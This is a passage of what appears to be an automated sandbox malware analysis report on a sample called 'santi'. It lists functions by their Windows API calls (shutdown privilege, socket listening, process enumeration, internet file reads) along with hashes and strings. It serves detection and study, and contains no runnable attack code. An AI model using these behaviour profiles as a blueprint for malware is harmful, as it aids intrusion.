                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                • String ID: NULL Pointer assignment
                                                                • API String ID: 1300414916-2785691316
                                                                • Opcode ID: caaba52ec957c383156421745eb4394f00c728397c5228ac422a5e82612ca3c7
                                                                • Instruction ID: 2c5a236d97f882e9e0572242a0f4148624ac1d151f291a7b2072d59b42d87a8a
                                                                • Opcode Fuzzy Hash: caaba52ec957c383156421745eb4394f00c728397c5228ac422a5e82612ca3c7
                                                                • Instruction Fuzzy Hash: 81914C71D10228ABDB12DF95DC95EEEBBB8EF08710F20812AF515B7291DB705A45CFA0
                                                                Function 003279D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0031B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                  • Part of subcall function 0031B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                  • Part of subcall function 0031B134: GetLastError.KERNEL32 ref: 0031B1BA
                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00327A0F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                • String ID: $@$SeShutdownPrivilege
                                                                • API String ID: 2234035333-194228
                                                                • Opcode ID: b3e5ba41007c3b4e4d7d51a3f21e3afa6c1a8775e09cd1e184184978a8a2fad5
                                                                • Instruction ID: 2ec397d947dd7424ba24d60ffcacdcef6efe4e72307aa19cc3d6bd73522f0af1
                                                                • Opcode Fuzzy Hash: b3e5ba41007c3b4e4d7d51a3f21e3afa6c1a8775e09cd1e184184978a8a2fad5
                                                                • Instruction Fuzzy Hash: E301F7717592326AF72B1668AC5BBBF725CBB04760F154824FD03A22D2D6A09E0081B4
                                                                Function 002E9B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60$8
                                                                • API String ID: 0-623596573
                                                                • Opcode ID: 06b2caa56b4c298b2946a4dff3196bc354ffe2eb6e2244f6979d2a403c4ee012
                                                                • Instruction ID: 5137b36fcb4c71a9f8b0a0c192e0c6bc5dd3bf349d20be47847e5bcdfe9ae97f
                                                                • Opcode Fuzzy Hash: 06b2caa56b4c298b2946a4dff3196bc354ffe2eb6e2244f6979d2a403c4ee012
                                                                • Instruction Fuzzy Hash: 1D92AB70E2025ACBDF25CF59C8807BDB7B1BB54300F65819AE85AAB284D770ADD1CF91
                                                                Function 00338C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00338CA8
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338CB7
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00338CD3
                                                                • listen.WSOCK32(00000000,00000005), ref: 00338CE2
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338CFC
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00338D10
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                • String ID:
                                                                • API String ID: 1279440585-0
                                                                • Opcode ID: 5c3a8fa34f0650211d0234fbdf3071de09a12fb9b53599c53578378c9affe1d7
                                                                • Instruction ID: caee94a37e23f552c30e70d1d0a9f9f65b0b68e86c14ede645507426a4875ee0
                                                                • Opcode Fuzzy Hash: 5c3a8fa34f0650211d0234fbdf3071de09a12fb9b53599c53578378c9affe1d7
                                                                • Instruction Fuzzy Hash: 9B21E531700600AFCB12EF68DD85B6EB7A9EF49710F118159F956AB3D2CB70AD41CB61
                                                                Function 00326532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00326554
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00326564
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00326583
                                                                • __wsplitpath.LIBCMT ref: 003265A7
                                                                • _wcscat.LIBCMT ref: 003265BA
                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003265F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                • String ID:
                                                                • API String ID: 1605983538-0
                                                                • Opcode ID: aa90b0cd7bc95e23898b0e7ccc1625f6b383c9616ddc2d87303b7058e49e78ad
                                                                • Instruction ID: 36711726624c849d54787ec1e2a31d0e898e116d94e42e8264fc0bb84bf5dfbd
                                                                • Opcode Fuzzy Hash: aa90b0cd7bc95e23898b0e7ccc1625f6b383c9616ddc2d87303b7058e49e78ad
                                                                • Instruction Fuzzy Hash: 0E218771900219ABDB12ABA4DC89FEEB7BCAF4A300F6044A5F505E7141DBB59F85CB60
                                                                Function 003213CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003213DC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: ($,29$<29$|
                                                                • API String ID: 1659193697-2929170881
                                                                • Opcode ID: c7a9bfa7b916a5ca5c729fd53beafed28555ae640281d2faa2ba613019fa568a
                                                                • Instruction ID: 9691a39b3ff7d37c2699d506c460c355bb62416886486b80910a25756d52286e
                                                                • Opcode Fuzzy Hash: c7a9bfa7b916a5ca5c729fd53beafed28555ae640281d2faa2ba613019fa568a
                                                                • Instruction Fuzzy Hash: 3C322475A006159FCB29DF29D58096AF7F0FF58320B12C46EE59ADB3A1E770E981CB40
                                                                Function 0033923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0033A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00339296
                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003392B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 4170576061-0
                                                                • Opcode ID: a0aa48f11ca8d4f9b83f63e200cbd6fcc419d2931a6a03a4bc485e72e20a90fa
                                                                • Instruction ID: c892286fcfefd1ed550e78930279e2cb0072d5e298dc7c37ea5b3c57d897883e
                                                                • Opcode Fuzzy Hash: a0aa48f11ca8d4f9b83f63e200cbd6fcc419d2931a6a03a4bc485e72e20a90fa
                                                                • Instruction Fuzzy Hash: 6341F270600204EFDB11AF28C882E7EB7EDEF44764F05845DFA56AB3C2CAB49D118B91
                                                                Function 0032EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0032EB8A
                                                                • _wcscmp.LIBCMT ref: 0032EBBA
                                                                • _wcscmp.LIBCMT ref: 0032EBCF
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0032EBE0
                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0032EC0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 2387731787-0
                                                                • Opcode ID: 986c7bef5725172dd069d254b3995e8df6d61960f05b6702e4bde1517518f8cd
                                                                • Instruction ID: beec7fa1a7c5b3bf8666f8bc8fcea9da40a287c684035840f39d51ffb4ce6515
                                                                • Opcode Fuzzy Hash: 986c7bef5725172dd069d254b3995e8df6d61960f05b6702e4bde1517518f8cd
                                                                • Instruction Fuzzy Hash: 3041C035604311CFC719DF68D491AAAB3E8FF49320F10456EEA5A8B3A1DB71A944CF51
                                                                Function 00348111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                • String ID:
                                                                • API String ID: 292994002-0
                                                                • Opcode ID: ca77cce723d872cc0a939479e1e93a6c2ffaf4eb188afa786f41ec6b17642b31
                                                                • Instruction ID: 952a8baa873e6d0a104776dab9207215d7b05c67aed7c2b0a37018b68d6402e8
                                                                • Opcode Fuzzy Hash: ca77cce723d872cc0a939479e1e93a6c2ffaf4eb188afa786f41ec6b17642b31
                                                                • Instruction Fuzzy Hash: 3011B231700110ABE7236F26DC44E6FBBDCEF45760F06442AF94ADB281CF70A9028AA5
                                                                Function 002FE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002FE014,771B0AE0,002FDEF1,0037DC38,?,?), ref: 002FE02C
                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002FE03E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                • API String ID: 2574300362-192647395
                                                                • Opcode ID: e5c197d88ac59905d5321688a9bd16446a1968f6ff1114f416ecd8eb145dbcb3
                                                                • Instruction ID: 3175868f65567fe83fb8723c2a813ecd1f3a3f3ac6511786eb33e6169c757f37
                                                                • Opcode Fuzzy Hash: e5c197d88ac59905d5321688a9bd16446a1968f6ff1114f416ecd8eb145dbcb3
                                                                • Instruction Fuzzy Hash: 67D0A730D11B13EFCF334F61ED48663B6D8AF01300F19842DE482E2160DBF4C8808650
                                                                Function 002F3B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                • String ID: @$ :$ :$ :
                                                                • API String ID: 3728558374-311032763
                                                                • Opcode ID: 1ed7b7bd974097c0c7377823c70c206050006374277b7d93ef7e20c409eaeb98
                                                                • Instruction ID: aa0e6ad0206532a2b2840d042df5fa5319c1481156bd8e142957ae0b6cce319d
                                                                • Opcode Fuzzy Hash: 1ed7b7bd974097c0c7377823c70c206050006374277b7d93ef7e20c409eaeb98
                                                                • Instruction Fuzzy Hash: E972BC30E142099FCB15EF94C481EBEF7B5EF48380F15806AEE09AB291D770AE55CB91
                                                                Function 002FB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 002FB22F
                                                                  • Part of subcall function 002FB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 002FB5A5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Proc$LongWindow
                                                                • String ID:
                                                                • API String ID: 2749884682-0
                                                                • Opcode ID: 3c398d43da8edd3678b0ec7ed13f59f038240a0fbfcb18d2be2e71c9bf8c4b04
                                                                • Instruction ID: 7d9672d638da6fbfbef28f28c7200fdf66935b49e0a91e86860eb7b3030c0820
                                                                • Opcode Fuzzy Hash: 3c398d43da8edd3678b0ec7ed13f59f038240a0fbfcb18d2be2e71c9bf8c4b04
                                                                • Instruction Fuzzy Hash: 0FA147A013400DFADB2F6E2ACC88D7FA95CEB463C5F154139FE02DA5A2DB559D209272
                                                                Function 00334EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003343BF,00000000), ref: 00334FA6
                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00334FD2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                • String ID:
                                                                • API String ID: 599397726-0
                                                                • Opcode ID: 6b209cee9a593a38127cbb6442b2cd683c8781108a06e6398b6b6adc14456584
                                                                • Instruction ID: 683eff71728220f1b5f66876295087e52135e69910bb683f8836b9d580dc0dba
                                                                • Opcode Fuzzy Hash: 6b209cee9a593a38127cbb6442b2cd683c8781108a06e6398b6b6adc14456584
                                                                • Instruction Fuzzy Hash: 8541E771604609BFEB229F84CDC5FBFB7BCEB40754F14402EF205A6181DA71AE4196A0
                                                                Function 002E77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID: \Q9
                                                                • API String ID: 4104443479-1715661531
                                                                • Opcode ID: 5afb80cc35ca3a6b68cd36a1711ecafd272d8dc7eeade7fa0d23177ac1a1be44
                                                                • Instruction ID: 8cd715ac7c8375a18d719514dcf79dbfa07f640068acd92f52145cdfe4cfbf49
                                                                • Opcode Fuzzy Hash: 5afb80cc35ca3a6b68cd36a1711ecafd272d8dc7eeade7fa0d23177ac1a1be44
                                                                • Instruction Fuzzy Hash: 45A28C74E14259CFCB25CF59C480AADBBB1FF48314F6581AAE859AB390D7709E91CF80
                                                                Function 0032E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0032E20D
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0032E267
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0032E2B4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1682464887-0
                                                                • Opcode ID: cafedd169384ab7c7026f63dff863ee77f99d75e4fbcde54a9717833ce12efb3
                                                                • Instruction ID: 6223f2d24003d660a74390ff421d6e113be69639ff09a064c0b888bffac213d1
                                                                • Opcode Fuzzy Hash: cafedd169384ab7c7026f63dff863ee77f99d75e4fbcde54a9717833ce12efb3
                                                                • Instruction Fuzzy Hash: 6F219A35A10218EFCB01EFA5D885AADFBB8FF49310F0584AAE906AB351CB719915CF50
                                                                Function 0031B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0031B180
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0031B1AD
                                                                • GetLastError.KERNEL32 ref: 0031B1BA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1922334811-0
                                                                • Opcode ID: f710fa9a6e406de0bc83798f64dc338c8c486f8005eb5d0bc5a620ceb5364572
                                                                • Instruction ID: ce94b29bf10b1e58914e8d59b250ab5cc3e12353421a937b64eefab68c50b4ba
                                                                • Opcode Fuzzy Hash: f710fa9a6e406de0bc83798f64dc338c8c486f8005eb5d0bc5a620ceb5364572
                                                                • Instruction Fuzzy Hash: C511BCB2910205BFE718AF64DD85D6BF7ACFF48310B21853EE55693240EBB0FC418A60
                                                                Function 00326606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00326623
                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00326664
                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0032666F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
